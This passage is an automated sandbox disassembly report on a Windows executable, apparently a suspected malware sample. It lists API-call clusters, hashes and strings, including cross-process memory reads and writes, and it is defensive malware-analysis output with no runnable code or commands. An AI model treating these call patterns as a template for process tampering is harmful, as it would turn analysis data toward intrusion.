                                              • Opcode ID: 84639ec7b136dd56979e106584935e8fbc4edd012b2c11e0045254baee25475a
                                              • Instruction ID: 1604d9476166af1f5f399116128baf82fa31f0fd6fb8091b48d0cbbe2d13a46b
                                              • Opcode Fuzzy Hash: 84639ec7b136dd56979e106584935e8fbc4edd012b2c11e0045254baee25475a
                                              • Instruction Fuzzy Hash: 14218F36904618EADF208FA0DC84AEE77B8FF44724F109216E929BA1C0E77089C5CF61
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00DF0951
                                              • GetForegroundWindow.USER32 ref: 00DF0968
                                              • GetDC.USER32(00000000), ref: 00DF09A4
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00DF09B0
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00DF09E8
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: e36313fe63ae59a9bab1d44741ca52e39d9724eb526444a4ca382a0a80e3a549
                                              • Instruction ID: e36b53110bd9ed318a2d33169a0b208c547aeedbac9b3c732e0c872f8e52f282
                                              • Opcode Fuzzy Hash: e36313fe63ae59a9bab1d44741ca52e39d9724eb526444a4ca382a0a80e3a549
                                              • Instruction Fuzzy Hash: 19218135600204AFD714EF65D885AAEBBF5EF48704F148169F94AA7362DB71AC44CBA0
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 00DACDC6
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DACDE9
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DACE0F
                                              • _free.LIBCMT ref: 00DACE22
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DACE31
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 7a4263831ac30ad41030af2193f81e5d137625d44ec2dc22200480757b116b35
                                              • Instruction ID: f0b5190b18b11cb462a7dd3a53feee2ffecffc0353f06f81ec6a12b20e186583
                                              • Opcode Fuzzy Hash: 7a4263831ac30ad41030af2193f81e5d137625d44ec2dc22200480757b116b35
                                              • Instruction Fuzzy Hash: 800147726122107F672117BB6C8CD3B796DDFC7BB03281229FD00E3200EA218E0181F1
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                              • SelectObject.GDI32(?,00000000), ref: 00D896A2
                                              • BeginPath.GDI32(?), ref: 00D896B9
                                              • SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 96a3aa06df7ab3e50637350e2bb6ea44deec94463a10ee875255caec79da22ee
                                              • Instruction ID: c68bfd2233d75da9c05a3c3c7e2bc7b92cccd34c48163cca999b46f9b47729c8
                                              • Opcode Fuzzy Hash: 96a3aa06df7ab3e50637350e2bb6ea44deec94463a10ee875255caec79da22ee
                                              • Instruction Fuzzy Hash: 5B217134802305EFDF11AF66DC257B97B74BB91365F280256F560B61A0E37198DACFA0
                                              APIs
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: b3dd3ddf4004d5d229b6f8fe4b9a4f6ffcdd4e2a910e3a66ef6685671dfc31cb
                                              • Instruction ID: 63e93584a7a0f0d4e23de71208c070de31638c5e68db19b8dddeb93ae26a7588
                                              • Opcode Fuzzy Hash: b3dd3ddf4004d5d229b6f8fe4b9a4f6ffcdd4e2a910e3a66ef6685671dfc31cb
                                              • Instruction Fuzzy Hash: C501926564170AFAE6185510AD82FBA735CDB21394B244022FD14AA785F661ED6086B4
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,00D9F2DE,00DA3863,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6), ref: 00DA2DFD
                                              • _free.LIBCMT ref: 00DA2E32
                                              • _free.LIBCMT ref: 00DA2E59
                                              • SetLastError.KERNEL32(00000000,00D71129), ref: 00DA2E66
                                              • SetLastError.KERNEL32(00000000,00D71129), ref: 00DA2E6F
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 564f89531f80c5e979cd7ec1be7cbc40cbe7f61fe21ce710ba50d82e81732851
                                              • Instruction ID: 08656b00cde4fcf5778cd19b554f325b5773cc2f27b8fa44b74ffb6942edd344
                                              • Opcode Fuzzy Hash: 564f89531f80c5e979cd7ec1be7cbc40cbe7f61fe21ce710ba50d82e81732851
                                              • Instruction Fuzzy Hash: 2501F4322456006FC612273F6C4AE3B266AEBD37B1B384128F465F21D2EB79CE854130
                                              APIs
                                              • CLSIDFromProgID.COMBASE ref: 00DD002B
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DD0046
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0054
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DD0064
                                              • CLSIDFromString.COMBASE(?,?), ref: 00DD0070
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: c36aa03c84fcaf80cff0376827fddea116ba06a744ad10f193de8647febe5c0b
                                              • Instruction ID: 6a9fbf52b323aab9dd0a9e265b540d11b9667e3ae8972580642290f4e501a7db
                                              • Opcode Fuzzy Hash: c36aa03c84fcaf80cff0376827fddea116ba06a744ad10f193de8647febe5c0b
                                              • Instruction Fuzzy Hash: D0018F72600204BFDB104F69DC04BBA7EADEB84752F248225F905E2210D776DD848BB0
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE997
                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 00DDE9A5
                                              • Sleep.KERNEL32(00000000), ref: 00DDE9AD
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE9B7
                                              • Sleep.KERNEL32 ref: 00DDE9F3
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: f0368be5a0c004b647255198b6fed3fdfdd01f1df158cc8b67aecace76053261
                                              • Instruction ID: e818860c27568ca3e77933f41a5894dac21197659c684f5365695352382773c8
                                              • Opcode Fuzzy Hash: f0368be5a0c004b647255198b6fed3fdfdd01f1df158cc8b67aecace76053261
                                              • Instruction Fuzzy Hash: 1E011731C02629DBCF00ABE6DC69AEDFB78FB09701F100656E542B6251CB3196998BA1
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD1136
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 883493501-0
                                              • Opcode ID: 06dd1ba27d71278d4e0eb0208cca3669be1ed8364a670a0b4e875fd1dbecc544
                                              • Instruction ID: bd7e8736d01f0289490ff559aebd2637ac336495900fa1fbfb32da7eb025cf9f
                                              • Opcode Fuzzy Hash: 06dd1ba27d71278d4e0eb0208cca3669be1ed8364a670a0b4e875fd1dbecc544
                                              • Instruction Fuzzy Hash: 67011D79101305BFDB114FA5DC49A6A3B7EEF89360B244515FA45D7350DA32DC849A60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0FCA
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0FD6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0FE5
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DD0FEC
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD1002
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: 3e4f75c55c167d1683df3fba7780db6f05a3e80f6c70afe93d5e0e17425c2022
                                              • Instruction ID: e922cde4de68dbc8bf8a24e81ded39a0bb27a035172c4105631f3d9d8a066467
                                              • Opcode Fuzzy Hash: 3e4f75c55c167d1683df3fba7780db6f05a3e80f6c70afe93d5e0e17425c2022
                                              • Instruction Fuzzy Hash: C5F0AF39140302BFD7211FA59C49F563B6DEF89761F200515F905D6250CA31DC808A60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1036
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1045
                                              • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DD104C
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1062
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: 9c2c968f44edc3867b8fc8bfb93bf017d8c4c1050c31bad15f401bfec9802f0c
                                              • Instruction ID: ebe7f89718480dc4c49d08be37b22f95b1e4bc252893911bfff108822e2549cf
                                              • Opcode Fuzzy Hash: 9c2c968f44edc3867b8fc8bfb93bf017d8c4c1050c31bad15f401bfec9802f0c
                                              • Instruction Fuzzy Hash: 94F04939201301BFDB216FA6EC49F663BADEF89761F240515FA45E6250CA72D8848A60
                                              APIs
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0324
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0331
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE033E
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE034B
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0358
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0365
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 90b9cb27bc75663db864975de0ece11965fa95581c1cf660c974719580dfbe12
                                              • Instruction ID: 3cc1f321891342710747b17d3bfe05fd79b9261b2d514b41ea805aa19a9661f0
                                              • Opcode Fuzzy Hash: 90b9cb27bc75663db864975de0ece11965fa95581c1cf660c974719580dfbe12
                                              • Instruction Fuzzy Hash: 1401AE72800B559FCB30AF66D880812FBF9BF603153198A3FD19652931C3B1A998CF90
                                              APIs
                                              • _free.LIBCMT ref: 00DAD752
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DAD764
                                              • _free.LIBCMT ref: 00DAD776
                                              • _free.LIBCMT ref: 00DAD788
                                              • _free.LIBCMT ref: 00DAD79A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ea22048de59b337d403776d97211f6caeb9be652736a7e4f677a0e4876c39ff5
                                              • Instruction ID: 0a04668304671d31a5373e0a2641b1fa61487ff161d88acd0f585fe8193b45cf
                                              • Opcode Fuzzy Hash: ea22048de59b337d403776d97211f6caeb9be652736a7e4f677a0e4876c39ff5
                                              • Instruction Fuzzy Hash: ADF0EC32544208AF8669EB6AF9C5C2A7BDEFB46710BA90C05F04AF7911C730FC808A75
                                              APIs
                                              • _free.LIBCMT ref: 00DA22BE
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DA22D0
                                              • _free.LIBCMT ref: 00DA22E3
                                              • _free.LIBCMT ref: 00DA22F4
                                              • _free.LIBCMT ref: 00DA2305
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 9fb320d47fbf53f996a6a73141b71ad34c3371672e39899faa0d06c96b8a0d2b
                                              • Instruction ID: 17739bd22a9559f1c85b443500a9095299685246d0716c3ac9106150f59df967
                                              • Opcode Fuzzy Hash: 9fb320d47fbf53f996a6a73141b71ad34c3371672e39899faa0d06c96b8a0d2b
                                              • Instruction Fuzzy Hash: 94F054785402108F8B56AF6BBC018293F64F71BB517160566F510F2371C730555ABFF9
                                              APIs
                                              • EndPath.GDI32(?), ref: 00D895D4
                                              • StrokeAndFillPath.GDI32(?,?,00DC71F7,00000000,?,?,?), ref: 00D895F0
                                              • SelectObject.GDI32(?,00000000), ref: 00D89603
                                              • DeleteObject.GDI32 ref: 00D89616
                                              • StrokePath.GDI32(?), ref: 00D89631
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                              • Instruction ID: d6d7ef7ccca58f52746e71e2a556c9aad06b0f5f972858d2f212352393bdfca7
                                              • Opcode Fuzzy Hash: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                              • Instruction Fuzzy Hash: E3F01938006204EFDB126F66ED287643B65EB82362F188354F6A9750F0D73189DADF20
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DD187F
                                              • CloseHandle.KERNEL32(?), ref: 00DD1894
                                              • CloseHandle.KERNEL32(?), ref: 00DD189C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD18A5
                                              • HeapFree.KERNEL32(00000000), ref: 00DD18AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                              • String ID:
                                              • API String ID: 3751786701-0
                                              • Opcode ID: 8f66747928f2ec7429fae3e8ada73c24e60bf29b58ed73f268c7d4035e0c75e4
                                              • Instruction ID: 6e4419053dac1f07529ccd9ae9481cef4e4b00a272f37b2849ed899ec3251be9
                                              • Opcode Fuzzy Hash: 8f66747928f2ec7429fae3e8ada73c24e60bf29b58ed73f268c7d4035e0c75e4
                                              • Instruction Fuzzy Hash: B4E0E536004102BFDB015FA2ED0C90ABF39FF49B22B208321F225A10B1CB3394A4DF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: __freea$_free
                                              • String ID: a/p$am/pm
                                              • API String ID: 3432400110-3206640213
                                              • Opcode ID: 989fbaa6c5e9f246f6df9bd1c9b6ee51c06716fea1c07ce309cbef61be6bc6a4
                                              • Instruction ID: a6edaffbf13c25c64c3194ec21f748fd181de4fb9ac13055e74ce12a3b068b1e
                                              • Opcode Fuzzy Hash: 989fbaa6c5e9f246f6df9bd1c9b6ee51c06716fea1c07ce309cbef61be6bc6a4
                                              • Instruction Fuzzy Hash: E6D1F039900206DADF289F68C856BFABBB5EF07310F2C4259E941AB650D375DD80CBB5
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • _wcslen.LIBCMT ref: 00DE9506
                                              • _wcslen.LIBCMT ref: 00DE952D
                                              • 7523D1A0.COMDLG32(00000058), ref: 00DE9585
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: _wcslen$7523
                                              • String ID: X
                                              • API String ID: 1414850397-3081909835
                                              • Opcode ID: a4ea78f436a825126a3f4c5d832898b9d419fd81f740f766c69a0ed11cf4bceb
                                              • Instruction ID: 8d85d8c90a22b4530620be0eef0afdc8e5278cb44fe08f46e1825210b9342daa
                                              • Opcode Fuzzy Hash: a4ea78f436a825126a3f4c5d832898b9d419fd81f740f766c69a0ed11cf4bceb
                                              • Instruction Fuzzy Hash: 9FE19F715043409FD724EF25C891A6AB7E0FF85314F18896DF8899B2A2EB31DD45CBB2
                                              APIs
                                                • Part of subcall function 00D90242: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D9024D
                                                • Part of subcall function 00D90242: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D9028A
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              • __Init_thread_footer.LIBCMT ref: 00DF6238
                                                • Part of subcall function 00D901F8: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D90202
                                                • Part of subcall function 00D901F8: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D90235
                                                • Part of subcall function 00DE359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DE35E4
                                                • Part of subcall function 00DE359C: LoadStringW.USER32(00E42390,?,00000FFF,?), ref: 00DE360A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                              • String ID: x#$x#$x#
                                              • API String ID: 1072379062-1894725482
                                              • Opcode ID: 78d5b76891a669c82d8965600fe6ac7a19423bfbbd837228465f47f321cf985f
                                              • Instruction ID: 1b3d1267dab4b009b227fe4d08b34e1edf8634d5e726aaaa321e33020c911088
                                              • Opcode Fuzzy Hash: 78d5b76891a669c82d8965600fe6ac7a19423bfbbd837228465f47f321cf985f
                                              • Instruction Fuzzy Hash: A0C15E71A00109AFCB14EF58D891DBEB7B9EF49300F158069FA55AB291DB70ED45CBB0
                                              APIs
                                                • Part of subcall function 00D90242: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D9024D
                                                • Part of subcall function 00D90242: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D9028A
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              • __Init_thread_footer.LIBCMT ref: 00DF7BFB
                                                • Part of subcall function 00D901F8: RtlEnterCriticalSection.NTDLL(00E4070C), ref: 00D90202
                                                • Part of subcall function 00D901F8: RtlLeaveCriticalSection.NTDLL(00E4070C), ref: 00D90235
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                              • String ID: 5$G$Variable must be of type 'Object'.
                                              • API String ID: 535116098-3733170431
                                              • Opcode ID: 9b9689a8d4d9e7a6a56b2c0e24e12974a86ccd3b61ad6564d00e361b3001fae7
                                              • Instruction ID: 0dc6cd768527cc6b6cd2028d63a15cc84f826f80514aa15d7c898734e1a0d0b8
                                              • Opcode Fuzzy Hash: 9b9689a8d4d9e7a6a56b2c0e24e12974a86ccd3b61ad6564d00e361b3001fae7
                                              • Instruction Fuzzy Hash: 8D917974A04209EFCB04EF54D8919FDB7B1EF49300F558059FA46AB292EB71AE81CB71
                                              APIs
                                                • Part of subcall function 00DDB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD21D0,?,?,00000034,00000800,?,00000034), ref: 00DDB42D
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DD2760
                                                • Part of subcall function 00DDB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00DDB3F8
                                                • Part of subcall function 00DDB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00DDB355
                                                • Part of subcall function 00DDB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DD2194,00000034,?,?,00001004,00000000,00000000), ref: 00DDB365
                                                • Part of subcall function 00DDB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DD2194,00000034,?,?,00001004,00000000,00000000), ref: 00DDB37B
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD27CD
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD281A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: ba57166e1101fefd9a59682a1dbcfd34862bed014c3cc292fa428072393764ca
                                              • Instruction ID: 7423608a9af96fbfb9606642575d82467e5da14bef601ce50754fb88f1d1a318
                                              • Opcode Fuzzy Hash: ba57166e1101fefd9a59682a1dbcfd34862bed014c3cc292fa428072393764ca
                                              • Instruction Fuzzy Hash: 43413C72900218BEDB10DBA4CC41AEEBBB8EB05714F104056EA55B7281DB716E85DBA1
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\qlG7x91YXH.exe,00000104), ref: 00DA1769
                                              • _free.LIBCMT ref: 00DA1834
                                              • _free.LIBCMT ref: 00DA183E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\qlG7x91YXH.exe
                                              • API String ID: 2506810119-2142809231
                                              • Opcode ID: 223fe266accfad9245829b5b911898c59503ba0c17e14df8738736f7fecac2aa
                                              • Instruction ID: b48d844d9962b080cb74f596bbccc3156d276c0ada9b5f7297566f97d465f6ce
                                              • Opcode Fuzzy Hash: 223fe266accfad9245829b5b911898c59503ba0c17e14df8738736f7fecac2aa
                                              • Instruction Fuzzy Hash: A631A279A44218FFCB21DFA99881D9EBBFCEB86310F1441A6F404D7211D6B08E81DBB4
                                              APIs
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DDC306
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00DDC34C
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E41990,00FC5908), ref: 00DDC395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem
                                              • String ID: 0
                                              • API String ID: 135850232-4108050209
                                              • Opcode ID: 4c150814171d816d23721fc9692c41c191320fa743cf249049f4dc144f784d32
                                              • Instruction ID: a1128744710fdf9dd2bd4cfe9758bee3c89078061ff56f9f447370c6a8629530
                                              • Opcode Fuzzy Hash: 4c150814171d816d23721fc9692c41c191320fa743cf249049f4dc144f784d32
                                              • Instruction Fuzzy Hash: 43418D712143429FDB24DF29D884B1ABBA4EF85320F14961EE9A5973D1D730E904CB72
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0CC08,00000000,?,?,?,?), ref: 00E044AA
                                              • GetWindowLongW.USER32 ref: 00E044C7
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E044D7
                                              Strings
                                              Memory Dump Source
